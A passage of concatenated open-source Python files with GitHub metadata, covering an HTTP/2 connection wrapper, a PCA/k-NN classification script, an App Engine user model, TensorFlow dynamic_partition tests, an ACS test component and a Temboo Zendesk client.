**kwargs):
self._host = host
self._port = port
self._h1_kwargs = {
'secure': secure, 'ssl_context': ssl_context,
'proxy_host': proxy_host, 'proxy_port': proxy_port
}
self._h2_kwargs = {
'window_manager': window_manager, 'enable_push': enable_push,
'secure': secure, 'ssl_context': ssl_context,
'proxy_host': proxy_host, 'proxy_port': proxy_port
}
# Add any unexpected kwargs to both dictionaries.
self._h1_kwargs.update(kwargs)
self._h2_kwargs.update(kwargs)
self._conn = HTTP11Connection(
self._host, self._port, **self._h1_kwargs
)
def request(self, method, url, body=None, headers={}):
"""
This will send a request to the server using the HTTP request method
``method`` and the selector ``url``. If the ``body`` argument is
        present, it should be a string or bytes object of data to send after
        the headers are finished. Strings are encoded as UTF-8. To use other
encodings, pass a bytes object. The Content-Length header is set to the
length of the body field.
:param method: The request method, e.g. ``'GET'``.
:param url: The URL to contact, e.g. ``'/path/segment'``.
:param body: (optional) The request body to send. Must be a bytestring
or a file-like object.
:param headers: (optional) The headers to send on the request.
:returns: A stream ID for the request, or ``None`` if the request is
made over HTTP/1.1.
"""
try:
return self._conn.request(
method=method, url=url, body=body, headers=headers
)
except TLSUpgrade as e:
# We upgraded in the NPN/ALPN handshake. We can just go straight to
# the world of HTTP/2. Replace the backing object and insert the
# socket into it.
assert e.negotiated in H2_NPN_PROTOCOLS
self._conn = HTTP20Connection(
self._host, self._port, **self._h2_kwargs
)
self._conn._sock = e.sock
# Because we skipped the connecting logic, we need to send the
# HTTP/2 preamble.
self._conn._send_preamble()
return self._conn.request(
method=method, url=url, body=body, headers=headers
)
def get_response(self, *args, **kwargs):
"""
Returns a response object.
"""
try:
return self._conn.get_response(*args, **kwargs)
except HTTPUpgrade as e:
# We upgraded via the HTTP Upgrade mechanism. We can just
# go straight to the world of HTTP/2. Replace the backing object
# and insert the socket into it.
assert e.negotiated == H2C_PROTOCOL
self._conn = HTTP20Connection(
self._host, self._port, **self._h2_kwargs
)
self._conn._sock = e.sock
# stream id 1 is used by the upgrade request and response
# and is half-closed by the client
self._conn._new_stream(stream_id=1, local_closed=True)
# HTTP/2 preamble must be sent after receipt of a HTTP/1.1 101
self._conn._send_preamble()
return self._conn.get_response(1)
# The following two methods are the implementation of the context manager
# protocol.
def __enter__(self): # pragma: no cover
return self
def __exit__(self, type, value, tb): # pragma: no cover
self._conn.close()
return False # Never swallow exceptions.
# Can anyone say 'proxy object pattern'?
def __getattr__(self, name):
return getattr(self._conn, name)
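# Minimal usage sketch (illustrative only; host and path are placeholders, and
# nothing here is executed so importing this module stays side-effect free):
#
#     conn = HTTPConnection('http2bin.org:443', secure=True)
#     conn.request('GET', '/get')
#     response = conn.get_response()
#     body = response.read()
#
# The object also works as a context manager, closing the underlying HTTP/1.1
# or HTTP/2 connection on exit:
#
#     with HTTPConnection('http2bin.org:443') as conn:
#         conn.request('GET', '/get')
#         body = conn.get_response().read()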
| {
"content_hash": "765d0f014eb9a08906f628e45edcacb5",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 85,
"avg_line_length": 40.79354838709678,
"alnum_prop": 0.6030365332911592,
"repo_name": "qqzwc/XX-Net",
"id": "a49d3d50e94e4ae7ee3906ef1d5e3d0aec30b0bc",
"size": "6347",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "code/default/python27/1.0/lib/noarch/hyper/common/connection.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3884"
},
{
"name": "C",
"bytes": "53301"
},
{
"name": "CSS",
"bytes": "86883"
},
{
"name": "HTML",
"bytes": "190128"
},
{
"name": "JavaScript",
"bytes": "6524"
},
{
"name": "Python",
"bytes": "15368059"
},
{
"name": "Shell",
"bytes": "7812"
},
{
"name": "Visual Basic",
"bytes": "1700"
}
],
"symlink_target": ""
} |
from numpy import mean,cov,double,cumsum,dot,linalg,array,rank,size,flipud
from pylab import *
import numpy as np
import matplotlib.pyplot as pp
#from enthought.mayavi import mlab
import scipy.ndimage as ni
import roslib; roslib.load_manifest('sandbox_tapo_darpa_m3')
import rospy
#import hrl_lib.mayavi2_util as mu
import hrl_lib.viz as hv
import hrl_lib.util as ut
import hrl_lib.matplotlib_util as mpu
import pickle
from mvpa.clfs.knn import kNN
from mvpa.datasets import Dataset
from mvpa.clfs.transerror import TransferError
from mvpa.misc.data_generators import normalFeatureDataset
from mvpa.algorithms.cvtranserror import CrossValidatedTransferError
from mvpa.datasets.splitters import NFoldSplitter
import sys
sys.path.insert(0, '/home/tapo/svn/robot1_data/usr/tapo/data_code/Classification/Data/Single_Contact_kNN/6')
from data_6 import Fmat_original
def pca(X):
#get dimensions
num_data,dim = X.shape
#center data
mean_X = X.mean(axis=1)
M = (X-mean_X) # subtract the mean (along columns)
Mcov = cov(M)
print 'PCA - COV-Method used'
val,vec = linalg.eig(Mcov)
#return the projection matrix, the variance and the mean
return vec,val,mean_X, M, Mcov
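# Hedged usage sketch for pca() (synthetic shape, not the experiment data): for
# a 10x40 np.matrix the call below would return a 10x10 eigenvector matrix, 10
# eigenvalues, the 10 per-row means, the row-centered matrix and its covariance.
#     vec_d, val_d, mu_d, M_d, C_d = pca(np.matrix(np.random.randn(10, 40)))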
def my_mvpa(Y,num2):
#Using PYMVPA
PCA_data = np.array(Y)
PCA_label_2 = ['Styrofoam-Fixed']*5 + ['Books-Fixed']*5 + ['Bucket-Fixed']*5 + ['Bowl-Fixed']*5 + ['Can-Fixed']*5 + ['Box-Fixed']*5 + ['Pipe-Fixed']*5 + ['Styrofoam-Movable']*5 + ['Container-Movable']*5 + ['Books-Movable']*5 + ['Cloth-Roll-Movable']*5 + ['Black-Rubber-Movable']*5 + ['Can-Movable']*5 + ['Box-Movable']*5 + ['Rug-Fixed']*5 + ['Bubble-Wrap-1-Fixed']*5 + ['Pillow-1-Fixed']*5 + ['Bubble-Wrap-2-Fixed']*5 + ['Sponge-Fixed']*5 + ['Foliage-Fixed']*5 + ['Pillow-2-Fixed']*5 + ['Rug-Movable']*5 + ['Bubble-Wrap-1-Movable']*5 + ['Pillow-1-Movable']*5 + ['Bubble-Wrap-2-Movable']*5 + ['Pillow-2-Movable']*5 + ['Cushion-Movable']*5 + ['Sponge-Movable']*5
clf = kNN(k=num2)
terr = TransferError(clf)
ds1 = Dataset(samples=PCA_data,labels=PCA_label_2)
cvterr = CrossValidatedTransferError(terr,NFoldSplitter(cvtype=1),enable_states=['confusion'])
error = cvterr(ds1)
return (1-error)*100
def result(eigvec_total,eigval_total,mean_data_total,B,C,num_PC):
    # Reduced eigenvector matrix built from the highest eigenvalues (considering the first 20, based on the figure above)
W = eigvec_total[:,0:num_PC]
m_W, n_W = np.shape(W)
# Normalizes the data set with respect to its variance (Not an Integral part of PCA, but useful)
length = len(eigval_total)
s = np.matrix(np.zeros(length)).T
i = 0
while i < length:
s[i] = sqrt(C[i,i])
i = i+1
Z = np.divide(B,s)
m_Z, n_Z = np.shape(Z)
#Projected Data:
Y = (W.T)*B # 'B' for my Laptop: otherwise 'Z' instead of 'B'
m_Y, n_Y = np.shape(Y.T)
return Y.T
if __name__ == '__main__':
Fmat = Fmat_original[0:82,:]
# Checking the Data-Matrix
m_tot, n_tot = np.shape(Fmat)
print 'Total_Matrix_Shape:',m_tot,n_tot
eigvec_total, eigval_total, mean_data_total, B, C = pca(Fmat)
#print eigvec_total
#print eigval_total
#print mean_data_total
m_eigval_total, n_eigval_total = np.shape(np.matrix(eigval_total))
m_eigvec_total, n_eigvec_total = np.shape(eigvec_total)
m_mean_data_total, n_mean_data_total = np.shape(np.matrix(mean_data_total))
print 'Eigenvalue Shape:',m_eigval_total, n_eigval_total
print 'Eigenvector Shape:',m_eigvec_total, n_eigvec_total
print 'Mean-Data Shape:',m_mean_data_total, n_mean_data_total
    # Recall that the cumulative sum of the eigenvalues shows the level of variance accounted for by each of the corresponding eigenvectors. On the x-axis is the number of eigenvalues used.
perc_total = cumsum(eigval_total)/sum(eigval_total)
num_PC=1
while num_PC <=20:
Proj = np.zeros((140,num_PC))
Proj = result(eigvec_total,eigval_total,mean_data_total,B,C,num_PC)
# PYMVPA:
num=0
cv_acc = np.zeros(21)
while num <=20:
cv_acc[num] = my_mvpa(Proj,num)
num = num+1
plot(np.arange(21),cv_acc,'-s')
grid('True')
hold('True')
num_PC = num_PC+1
legend(('1-PC', '2-PCs', '3-PCs', '4-PCs', '5-PCs', '6-PCs', '7-PCs', '8-PCs', '9-PCs', '10-PCs', '11-PC', '12-PCs', '13-PCs', '14-PCs', '15-PCs', '16-PCs', '17-PCs', '18-PCs', '19-PCs', '20-PCs'))
ylabel('Cross-Validation Accuracy')
xlabel('k in k-NN Classifier')
show()
| {
"content_hash": "665b85b579ee5f9ef4c261a4e474009e",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 664,
"avg_line_length": 36.632,
"alnum_prop": 0.6451190216204411,
"repo_name": "tapomayukh/projects_in_python",
"id": "2d7f9cdf33135d957e74e91a19d247c649d5660d",
"size": "4620",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "classification/Classification_with_kNN/Single_Contact_Classification/Final/best_kNN_PCA/objects/6/test11_cross_validate_objects_6_no_motion_1200ms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Matlab",
"bytes": "4903"
},
{
"name": "Python",
"bytes": "4451912"
}
],
"symlink_target": ""
} |
from google.appengine.api import users
from google.appengine.ext import ndb
class User(ndb.Model):
email = ndb.StringProperty()
@staticmethod
def checkUser():
googleUser = users.get_current_user()
if not googleUser:
return False
user = User.query(User.email == googleUser.email()).get()
if user:
return user
return False
@staticmethod
def loginUrl():
return users.create_login_url('/connect')
@staticmethod
def logoutUrl():
return users.create_logout_url('/')
@staticmethod
def connect():
googleUser = users.get_current_user()
if googleUser:
user = User()
user.email = googleUser.email()
user.put()
return user
else:
return "not connected" | {
"content_hash": "087251472aeb06f97753714e970c8598",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 59,
"avg_line_length": 17.725,
"alnum_prop": 0.688293370944993,
"repo_name": "racheliel/My-little-business",
"id": "94108701b221e7bce1b10247a1124787076652b7",
"size": "709",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "MyLittleBuisness/models/userGoogle.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ASP",
"bytes": "121753"
},
{
"name": "C#",
"bytes": "93099"
},
{
"name": "CSS",
"bytes": "37559"
},
{
"name": "HTML",
"bytes": "80268"
},
{
"name": "JavaScript",
"bytes": "47333"
},
{
"name": "PowerShell",
"bytes": "3137"
},
{
"name": "Python",
"bytes": "28489"
}
],
"symlink_target": ""
} |
"""Tests for the DynamicPartition op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gradients_impl
import tensorflow.python.ops.data_flow_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
class DynamicPartitionTest(test.TestCase):
def testSimpleOneDimensional(self):
with self.session(use_gpu=True) as sess:
data = constant_op.constant([0, 13, 2, 39, 4, 17], dtype=dtypes.float32)
indices = constant_op.constant([0, 0, 2, 3, 2, 1])
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=4)
partition_vals = sess.run(partitions)
self.assertEqual(4, len(partition_vals))
self.assertAllEqual([0, 13], partition_vals[0])
self.assertAllEqual([17], partition_vals[1])
self.assertAllEqual([2, 4], partition_vals[2])
self.assertAllEqual([39], partition_vals[3])
# Vector data input to DynamicPartition results in
# `num_partitions` vectors of unknown length.
self.assertEqual([None], partitions[0].get_shape().as_list())
self.assertEqual([None], partitions[1].get_shape().as_list())
self.assertEqual([None], partitions[2].get_shape().as_list())
self.assertEqual([None], partitions[3].get_shape().as_list())
def testSimpleTwoDimensional(self):
with self.session(use_gpu=True) as sess:
data = constant_op.constant([[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10, 11],
[12, 13, 14], [15, 16, 17]],
dtype=dtypes.float32)
indices = constant_op.constant([0, 0, 2, 3, 2, 1])
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=4)
partition_vals = sess.run(partitions)
self.assertEqual(4, len(partition_vals))
self.assertAllEqual([[0, 1, 2], [3, 4, 5]], partition_vals[0])
self.assertAllEqual([[15, 16, 17]], partition_vals[1])
self.assertAllEqual([[6, 7, 8], [12, 13, 14]], partition_vals[2])
self.assertAllEqual([[9, 10, 11]], partition_vals[3])
# Vector data input to DynamicPartition results in
# `num_partitions` matrices with an unknown number of rows, and 3 columns.
self.assertEqual([None, 3], partitions[0].get_shape().as_list())
self.assertEqual([None, 3], partitions[1].get_shape().as_list())
self.assertEqual([None, 3], partitions[2].get_shape().as_list())
self.assertEqual([None, 3], partitions[3].get_shape().as_list())
def testLargeOneDimensional(self):
num = 100000
data_list = [x for x in range(num)]
indices_list = [x % 2 for x in range(num)]
part1 = [x for x in range(num) if x % 2 == 0]
part2 = [x for x in range(num) if x % 2 == 1]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=2)
partition_vals = sess.run(partitions)
self.assertEqual(2, len(partition_vals))
self.assertAllEqual(part1, partition_vals[0])
self.assertAllEqual(part2, partition_vals[1])
def testLargeTwoDimensional(self):
rows = 100000
cols = 100
data_list = [None] * rows
for i in range(rows):
data_list[i] = [i for _ in range(cols)]
num_partitions = 97
indices_list = [(i ** 2) % num_partitions for i in range(rows)]
parts = [[] for _ in range(num_partitions)]
for i in range(rows):
parts[(i ** 2) % num_partitions].append(data_list[i])
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=num_partitions)
partition_vals = sess.run(partitions)
self.assertEqual(num_partitions, len(partition_vals))
for i in range(num_partitions):
# reshape because of empty parts
parts_np = np.array(parts[i], dtype=np.float).reshape(-1, cols)
self.assertAllEqual(parts_np, partition_vals[i])
def testSimpleComplex(self):
data_list = [1 + 2j, 3 + 4j, 5 + 6j, 7 + 8j]
indices_list = [1, 0, 1, 0]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.complex64)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=2)
partition_vals = sess.run(partitions)
self.assertEqual(2, len(partition_vals))
self.assertAllEqual([3 + 4j, 7 + 8j], partition_vals[0])
self.assertAllEqual([1 + 2j, 5 + 6j], partition_vals[1])
def testScalarPartitions(self):
data_list = [10, 13, 12, 11]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float64)
indices = 3
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=4)
partition_vals = sess.run(partitions)
self.assertEqual(4, len(partition_vals))
self.assertAllEqual(np.array([], dtype=np.float64).reshape(-1, 4),
partition_vals[0])
self.assertAllEqual(np.array([], dtype=np.float64).reshape(-1, 4),
partition_vals[1])
self.assertAllEqual(np.array([], dtype=np.float64).reshape(-1, 4),
partition_vals[2])
self.assertAllEqual(np.array([10, 13, 12, 11],
dtype=np.float64).reshape(-1, 4),
partition_vals[3])
def testHigherRank(self):
np.random.seed(7)
with self.session(use_gpu=True) as sess:
for n in 2, 3:
for shape in (4,), (4, 5), (4, 5, 2):
partitions = np.random.randint(n, size=np.prod(shape)).reshape(shape)
for extra_shape in (), (6,), (6, 7):
data = np.random.randn(*(shape + extra_shape))
partitions_t = constant_op.constant(partitions, dtype=dtypes.int32)
data_t = constant_op.constant(data)
outputs = data_flow_ops.dynamic_partition(
data_t, partitions_t, num_partitions=n)
self.assertEqual(n, len(outputs))
outputs_val = sess.run(outputs)
for i, output in enumerate(outputs_val):
self.assertAllEqual(output, data[partitions == i])
# Test gradients
outputs_grad = [7 * output for output in outputs_val]
grads = gradients_impl.gradients(outputs, [data_t, partitions_t],
outputs_grad)
self.assertEqual(grads[1], None) # Partitions has no gradients
self.assertAllEqual(7 * data, sess.run(grads[0]))
def testEmptyParts(self):
data_list = [1, 2, 3, 4]
indices_list = [1, 3, 1, 3]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=4)
partition_vals = sess.run(partitions)
self.assertEqual(4, len(partition_vals))
self.assertAllEqual([], partition_vals[0])
self.assertAllEqual([1, 3], partition_vals[1])
self.assertAllEqual([], partition_vals[2])
self.assertAllEqual([2, 4], partition_vals[3])
def testEmptyDataTwoDimensional(self):
data_list = [[], []]
indices_list = [0, 1]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=3)
partition_vals = sess.run(partitions)
self.assertEqual(3, len(partition_vals))
self.assertAllEqual([[]], partition_vals[0])
self.assertAllEqual([[]], partition_vals[1])
self.assertAllEqual(np.array([], dtype=np.float).reshape(0, 0),
partition_vals[2])
def testEmptyPartitions(self):
data_list = []
indices_list = []
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=2)
partition_vals = sess.run(partitions)
self.assertEqual(2, len(partition_vals))
self.assertAllEqual([], partition_vals[0])
self.assertAllEqual([], partition_vals[1])
@unittest.skip("Fails on windows.")
def testGPUTooManyParts(self):
# This test only makes sense on the GPU. There we do not check
# for errors. In this case, we should discard all but the first
# num_partitions indices.
if not test.is_gpu_available():
return
data_list = [1, 2, 3, 4, 5, 6]
indices_list = [6, 5, 4, 3, 1, 0]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=2)
partition_vals = sess.run(partitions)
self.assertEqual(2, len(partition_vals))
self.assertAllEqual([6], partition_vals[0])
self.assertAllEqual([5], partition_vals[1])
@unittest.skip("Fails on windows.")
def testGPUPartsTooLarge(self):
# This test only makes sense on the GPU. There we do not check
# for errors. In this case, we should discard all the values
# larger than num_partitions.
if not test.is_gpu_available():
return
data_list = [1, 2, 3, 4, 5, 6]
indices_list = [10, 11, 2, 12, 0, 1000]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=5)
partition_vals = sess.run(partitions)
self.assertEqual(5, len(partition_vals))
self.assertAllEqual([5], partition_vals[0])
self.assertAllEqual([], partition_vals[1])
self.assertAllEqual([3], partition_vals[2])
self.assertAllEqual([], partition_vals[3])
self.assertAllEqual([], partition_vals[4])
@unittest.skip("Fails on windows.")
def testGPUAllIndicesBig(self):
# This test only makes sense on the GPU. There we do not check
# for errors. In this case, we should discard all the values
# and have an empty output.
if not test.is_gpu_available():
return
data_list = [1.1, 2.1, 3.1, 4.1, 5.1, 6.1]
indices_list = [90, 70, 60, 100, 110, 40]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=40)
partition_vals = sess.run(partitions)
self.assertEqual(40, len(partition_vals))
for i in range(40):
self.assertAllEqual([], partition_vals[i])
def testErrorIndexOutOfRange(self):
with self.cached_session() as sess:
data = constant_op.constant([[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10, 11],
[12, 13, 14]])
indices = constant_op.constant([0, 2, 99, 2, 2])
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=4)
with self.assertRaisesOpError(r"partitions\[2\] = 99 is not in \[0, 4\)"):
sess.run(partitions)
def testScalarIndexOutOfRange(self):
with self.cached_session() as sess:
bad = 17
data = np.zeros(5)
partitions = data_flow_ops.dynamic_partition(data, bad, num_partitions=7)
with self.assertRaisesOpError(r"partitions = 17 is not in \[0, 7\)"):
sess.run(partitions)
def testHigherRankIndexOutOfRange(self):
with self.cached_session() as sess:
shape = (2, 3)
indices = array_ops.placeholder(shape=shape, dtype=np.int32)
data = np.zeros(shape + (5,))
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=7)
for i in xrange(2):
for j in xrange(3):
bad = np.zeros(shape, dtype=np.int32)
bad[i, j] = 17
with self.assertRaisesOpError(
r"partitions\[%d,%d\] = 17 is not in \[0, 7\)" % (i, j)):
sess.run(partitions, feed_dict={indices: bad})
def testErrorWrongDimsIndices(self):
data = constant_op.constant([[0], [1], [2]])
indices = constant_op.constant([[0], [0]])
with self.assertRaises(ValueError):
data_flow_ops.dynamic_partition(data, indices, num_partitions=4)
# see https://github.com/tensorflow/tensorflow/issues/17106
def testCUBBug(self):
x = constant_op.constant(np.random.randn(3072))
inds = [0]*189 + [1]*184 + [2]*184 + [3]*191 + [4]*192 + [5]*195 + [6]*195
inds += [7]*195 + [8]*188 + [9]*195 + [10]*188 + [11]*202 + [12]*194
inds += [13]*194 + [14]*194 + [15]*192
self.assertEqual(len(inds), x.shape[0])
partitioned = data_flow_ops.dynamic_partition(x, inds, 16)
with self.cached_session() as sess:
res = sess.run(partitioned)
self.assertEqual(res[-1].shape[0], 192)
if __name__ == "__main__":
test.main()
| {
"content_hash": "43f91d579663cdd7347f54b692717048",
"timestamp": "",
"source": "github",
"line_count": 329,
"max_line_length": 80,
"avg_line_length": 42.2370820668693,
"alnum_prop": 0.6389608520437536,
"repo_name": "alshedivat/tensorflow",
"id": "07da855a0174d7b217ac383758e358922b7e18e4",
"size": "14585",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tensorflow/python/kernel_tests/dynamic_partition_op_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3325"
},
{
"name": "Batchfile",
"bytes": "10132"
},
{
"name": "C",
"bytes": "439824"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "50398044"
},
{
"name": "CMake",
"bytes": "199209"
},
{
"name": "Dockerfile",
"bytes": "36386"
},
{
"name": "Go",
"bytes": "1276639"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "871083"
},
{
"name": "Jupyter Notebook",
"bytes": "2604347"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "61311"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "40038696"
},
{
"name": "RobotFramework",
"bytes": "890"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "486609"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
import acspytest__POA
from Acspy.Servants.ContainerServices import ContainerServices
from Acspy.Servants.ComponentLifecycle import ComponentLifecycle
from Acspy.Servants.ACSComponent import ACSComponent
from CORBA import TRUE, FALSE
#*******************************************************************************
# ALMA - Atacama Large Millimiter Array
# (c) Associated Universities Inc., 2002
# (c) European Southern Observatory, 2002
# Copyright by ESO (in the framework of the ALMA collaboration)
# and Cosylab 2002, All rights reserved
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
#
#------------------------------------------------------------------------------
'''
Module designed to test the full functionality of the Python Container. Since
Python is not a compiled language, it's vital that everything be tested.
'''
#------------------------------------------------------------------------------
class PyTestNestedModule(acspytest__POA.nested.PyTestNestedModule,
                         ACSComponent,        #Base IDL interface
                         ContainerServices,   #Developer niceties
                         ComponentLifecycle): #HLA stuff
    '''
    Component designed to test the functionality of the Python container.
    '''
    def __init__(self):
        ACSComponent.__init__(self)
        ContainerServices.__init__(self)
        return
def test(self):
'''
Python implementation of IDL method.
'''
print "Testing method from component in a nested module."
return
#------------------------------------------------------------------------------
if __name__ == "__main__":
print "Creating an object"
g = PyTestNestedModule()
g.test()
print "Done..."
| {
"content_hash": "a92e2b0e315d10f3e8e8dbe07668d28e",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 80,
"avg_line_length": 40.59322033898305,
"alnum_prop": 0.6200417536534447,
"repo_name": "csrg-utfsm/acscb",
"id": "2956456da2de05b0ab6807c66dbe72e5493cd2fc",
"size": "2395",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "LGPL/CommonSoftware/acspy/test/acspytestImpl/PyTestNestedModule.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "633"
},
{
"name": "Batchfile",
"bytes": "2346"
},
{
"name": "C",
"bytes": "751150"
},
{
"name": "C++",
"bytes": "7892598"
},
{
"name": "CSS",
"bytes": "21364"
},
{
"name": "Elixir",
"bytes": "906"
},
{
"name": "Emacs Lisp",
"bytes": "1990066"
},
{
"name": "FreeMarker",
"bytes": "7369"
},
{
"name": "GAP",
"bytes": "14867"
},
{
"name": "Gnuplot",
"bytes": "437"
},
{
"name": "HTML",
"bytes": "1857062"
},
{
"name": "Haskell",
"bytes": "764"
},
{
"name": "Java",
"bytes": "13573740"
},
{
"name": "JavaScript",
"bytes": "19058"
},
{
"name": "Lex",
"bytes": "5101"
},
{
"name": "Makefile",
"bytes": "1624406"
},
{
"name": "Module Management System",
"bytes": "4925"
},
{
"name": "Objective-C",
"bytes": "3223"
},
{
"name": "PLSQL",
"bytes": "9496"
},
{
"name": "Perl",
"bytes": "120411"
},
{
"name": "Python",
"bytes": "4191000"
},
{
"name": "Roff",
"bytes": "9920"
},
{
"name": "Shell",
"bytes": "1198375"
},
{
"name": "Smarty",
"bytes": "21615"
},
{
"name": "Tcl",
"bytes": "227078"
},
{
"name": "XSLT",
"bytes": "100454"
},
{
"name": "Yacc",
"bytes": "5006"
}
],
"symlink_target": ""
} |
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ListRecent(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ListRecent Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ListRecent, self).__init__(temboo_session, '/Library/Zendesk/Tickets/ListRecent')
def new_input_set(self):
return ListRecentInputSet()
def _make_result_set(self, result, path):
return ListRecentResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListRecentChoreographyExecution(session, exec_id, path)
class ListRecentInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ListRecent
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_Email(self, value):
"""
Set the value of the Email input for this Choreo. ((required, string) The email address you use to login to your Zendesk account.)
"""
super(ListRecentInputSet, self)._set_input('Email', value)
def set_Page(self, value):
"""
Set the value of the Page input for this Choreo. ((optional, integer) The page number of the results to be returned. Used together with the PerPage parameter to paginate a large set of results.)
"""
super(ListRecentInputSet, self)._set_input('Page', value)
def set_Password(self, value):
"""
Set the value of the Password input for this Choreo. ((required, password) Your Zendesk password.)
"""
super(ListRecentInputSet, self)._set_input('Password', value)
def set_PerPage(self, value):
"""
Set the value of the PerPage input for this Choreo. ((optional, integer) The number of results to return per page. Maximum is 100 and default is 100.)
"""
super(ListRecentInputSet, self)._set_input('PerPage', value)
def set_Server(self, value):
"""
Set the value of the Server input for this Choreo. ((required, string) Your Zendesk domain and subdomain (e.g., temboocare.zendesk.com).)
"""
super(ListRecentInputSet, self)._set_input('Server', value)
class ListRecentResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ListRecent Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Zendesk.)
"""
return self._output.get('Response', None)
def get_NextPage(self):
"""
Retrieve the value for the "NextPage" output from this Choreo execution. ((integer) The index for the next page of results.)
"""
return self._output.get('NextPage', None)
def get_PreviousPage(self):
"""
Retrieve the value for the "PreviousPage" output from this Choreo execution. ((integer) The index for the previous page of results.)
"""
return self._output.get('PreviousPage', None)
class ListRecentChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListRecentResultSet(response, path)
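# A hedged usage sketch (never called by the SDK): the import path, the
# TembooSession arguments and execute_with_results() follow the usual Temboo
# SDK pattern, but the credentials and server below are placeholders.
def _list_recent_example():
    from temboo.core.session import TembooSession
    session = TembooSession('ACCOUNT_NAME', 'APP_NAME', 'APP_KEY_VALUE')
    choreo = ListRecent(session)
    inputs = choreo.new_input_set()
    inputs.set_Email('agent@example.com')
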